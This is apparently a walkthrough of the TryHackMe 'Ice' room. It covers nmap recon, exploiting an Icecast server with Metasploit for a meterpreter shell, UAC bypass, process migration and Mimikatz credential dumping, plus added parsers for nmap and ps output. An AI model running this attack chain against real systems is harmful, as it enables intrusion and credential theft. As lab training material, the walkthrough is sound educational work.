Ice
Windows, CVE
Room Description
Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Find the THM room here.
Used Commands & Scripts
Scripts
- `post/multi/recon/local_exploit_suggester`
- `exploit/windows/local/bypassuac_eventvwr`
- `post/windows/manage/enable_rdp`
Commands
- `sudo nmap -A -sS -oN logfile.txt -vv <target ip>`
- `run post/multi/recon/local_exploit_suggester`
Recon
Start enumeration with nmap: `sudo nmap -A -sS -oN logfile.txt -vv <target ip>`
```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 05:27 EDT
[...]
Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
[...]
8000/tcp  open  http         syn-ack ttl 127 Icecast streaming media server
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49158/tcp open  unknown      syn-ack ttl 127
49159/tcp open  unknown      syn-ack ttl 127
49160/tcp open  unknown      syn-ack ttl 127
[...]
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
```
Read the log and you should find the following information:
- the port Microsoft Remote Desktop is running on
- the name of the service running on port 8000
- the hostname of the machine
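Reading the three answers out of a `-oN` log by hand is fine for one host, but the same log format turns up in every scan, so here is a small parser for it. This is an added example, not part of the original writeup or of nmap: it parses the port table and the `Service Info:` line from the trimmed output above (embedded as a constructed sample), and the `WELL_KNOWN` table that maps 3389 to Remote Desktop is my own fallback for ports nmap could only label `tcpwrapped` or `unknown`.

```python
import re
from dataclasses import dataclass

# Constructed sample: the trimmed nmap -oN/-vv log reproduced from this writeup.
SAMPLE_LOG = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 05:27 EDT
[...]
Not shown: 988 closed ports
Reason: 988 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 127
[...]
8000/tcp open http syn-ack ttl 127 Icecast streaming media server
49152/tcp open unknown syn-ack ttl 127
[...]
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port-table row: "<port>/<proto> <state> <service> <reason> [<version>]".
# With -vv the reason column is e.g. "syn-ack ttl 127"; the version is optional.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|open\|filtered)\s+"
    r"(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?:\s+ttl\s+\d+)?)"
    r"\s*(?P<version>.*)$"
)
HOST_LINE = re.compile(r"^Service Info:.*?Host:\s*(?P<host>[^;]+)")

# Assumption (my own table, not nmap output): well-known assignment used only when
# nmap's service column is uninformative ("tcpwrapped" / "unknown").
WELL_KNOWN = {3389: "Microsoft Remote Desktop (RDP)"}


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    reason: str
    version: str


def parse_nmap_log(text):
    """Return (list of PortEntry, hostname or None) from nmap normal output."""
    ports, host = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            ports.append(PortEntry(int(m["port"]), m["proto"], m["state"],
                                   m["service"], m["reason"], m["version"].strip()))
            continue
        h = HOST_LINE.match(line)
        if h:
            host = h["host"].strip()
    return ports, host


def describe_port(ports, number):
    """Best available description of an open port: the version banner if nmap
    got one, else the service name, else the well-known assignment."""
    for p in ports:
        if p.port == number and p.state == "open":
            if p.version:
                return p.version
            if p.service not in ("tcpwrapped", "unknown"):
                return p.service
            return WELL_KNOWN.get(number, p.service)
    return None


def summarize(text):
    """The three facts the room asks for, pulled from the log."""
    ports, host = parse_nmap_log(text)
    open_ports = {p.port: p for p in ports if p.state == "open"}
    # nmap labels a fingerprinted RDP listener "ms-wbt-server"; here it only
    # reports "tcpwrapped", so fall back to the standard port number.
    rdp = next((n for n, p in open_ports.items()
                if p.service == "ms-wbt-server" or n == 3389), None)
    return {"open_ports": sorted(open_ports), "rdp_port": rdp,
            "port_8000": describe_port(ports, 8000), "hostname": host}


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Point the script at your own `logfile.txt` by reading it into `summarize()`; the `tcpwrapped` fallback is the part to watch, since it is an inference from the port number rather than something nmap observed.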
Gain Access
Search for an existing exploit in one of the exploit databases.
I used exploit-db and searched for icecast.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_cve_icecast.png)
You will find multiple records, but only two of them refer to remote code execution. If you look closely, both refer to the same CVE. Look it up on cvedetails and use the first result for further investigation.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_cve_details.png)
If you find a page showing a CVSS Score of 7.5, you are on the right page. Search for `Vulnerability Type(s)`.
Metasploit
Open a new terminal and start `msfconsole`. Search for icecast using `search icecast`. What's the full path of the exploit?
Follow the instructions of the room.
Use the exploit: `use 0`
Check the options: `options`
And set the missing parameters: `set RHOSTS <target ip>`
Finally, check the options again and make sure the parameters are set correctly. Then run the exploit with `exploit`.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_reverse_shell.png)
If everything went well you should end up with an open meterpreter shell.
Escalate
Now, what should we do next? No idea? Run `post/multi/recon/local_exploit_suggester` in the current session. The result is a list of exploits the target seems to be vulnerable to.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_post_exploit_suggester.png)
To use one of the suggested exploits you first need to send the current meterpreter shell to the background by typing `background` or pressing CTRL-Z. I used CTRL-Z.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_background_shell.png)
Write down the path of the first exploit and use it with:
```
use exploit/windows/local/bypassuac_eventvwr
```
Check the options again and set the parameters (SESSION is usually 1, but it can vary):
```
options
set SESSION 1
set LHOST <attacker ip>
exploit
```
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_exploit_bypassuac.png)
Continue with the room.
Looting
I find the Looting section of that room to be explained pretty simply. This is the reason why I'll keep it compact.
Show all processes with `ps` and find the described process name. The process you are searching for contains one of the words printer, spool, service.
```
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System            x64   0
 416   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\smss.exe
 604   584   csrss.exe         x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 652   584   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 [...]
 1316  1016  dwm.exe           x64   1        Dark-PC\Dark         C:\Windows\System32\dwm.exe
 1328  1304  explorer.exe      x64   1        Dark-PC\Dark         C:\Windows\explorer.exe
 1368  692   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
 [...]
```
Migrate to this process using `migrate <process id>`. You can find the process ID in the column PID.
The migration was successful when you have gained higher permissions. Check this with `getuid` in the newly created meterpreter session.
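The `ps` listing above is worth more than a single PID: the same table is what a responder reads when triaging a host, and one check it supports is whether each image name agrees with the file the Path column points at. This is an added example, not part of the writeup or of Metasploit. It parses the rows reproduced above (embedded as a constructed sample), finds processes by a keyword such as "spool", and flags rows whose name and path disagree; in the sample that is the winlogon.exe row, whose path reads `svchost.exe` exactly as the listing shows it. The `ROW` regex and the mismatch rule are my own assumptions about the column layout, and a mismatch is a triage hint, not proof of tampering.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: rows reproduced from the meterpreter `ps` listing in this writeup.
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name          Arch  Session  User                 Path
 ---   ----  ----          ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System        x64   0
 416   4     smss.exe      x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\smss.exe
 604   584   csrss.exe     x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 652   584   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 1316  1016  dwm.exe       x64   1        Dark-PC\Dark         C:\Windows\System32\dwm.exe
 1328  1304  explorer.exe  x64   1        Dark-PC\Dark         C:\Windows\explorer.exe
 1368  692   spoolsv.exe   x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
"""

# Assumed column layout: PID PPID Name [Arch Session [User Path]].
# The user column may contain a space ("NT AUTHORITY\SYSTEM"), so it is matched
# lazily up to a path that starts with a drive letter.
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\[System Process\]|\S+)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>.+?)\s+(?P<path>[A-Za-z]:\\\S+))?)?\s*$"
)


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    arch: Optional[str]
    session: Optional[int]
    user: Optional[str]
    path: Optional[str]


def parse_ps(text):
    """Parse the process table; header, separator and blank lines are skipped."""
    procs = []
    for raw in text.splitlines():
        m = ROW.match(raw.strip())
        if not m:
            continue
        procs.append(Process(int(m["pid"]), int(m["ppid"]), m["name"], m["arch"],
                             int(m["session"]) if m["session"] else None,
                             m["user"], m["path"]))
    return procs


def find_by_keyword(procs, keyword):
    """Processes whose image name contains the keyword (case-insensitive)."""
    k = keyword.lower()
    return [p for p in procs if k in p.name.lower()]


def name_path_mismatches(procs):
    """Rows whose reported image name differs from the file name at the end of
    the Path column. Rows without a path (kernel pseudo-processes) are skipped."""
    out = []
    for p in procs:
        if p.path is None:
            continue
        basename = p.path.rsplit("\\", 1)[-1]
        if basename.lower() != p.name.lower():
            out.append(p)
    return out


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for p in find_by_keyword(procs, "spool"):
        print("keyword hit:", p.pid, p.name, p.user)
    for p in name_path_mismatches(procs):
        print("name/path mismatch:", p.pid, p.name, "->", p.path)
```

On a real listing, pass the saved `ps` output to `parse_ps()`; anything `name_path_mismatches()` returns deserves a second look at the binary on disk and its parent process before drawing a conclusion.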
Continue with Mimikatz.
Load Mimikatz with `load kiwi` and open the help menu with `help`.
`Kiwi Commands` is added to the help menu as part of the loading process.
Run the commands, play around, and answer the questions.
Post-Exploitation
Use the help menu to answer the questions.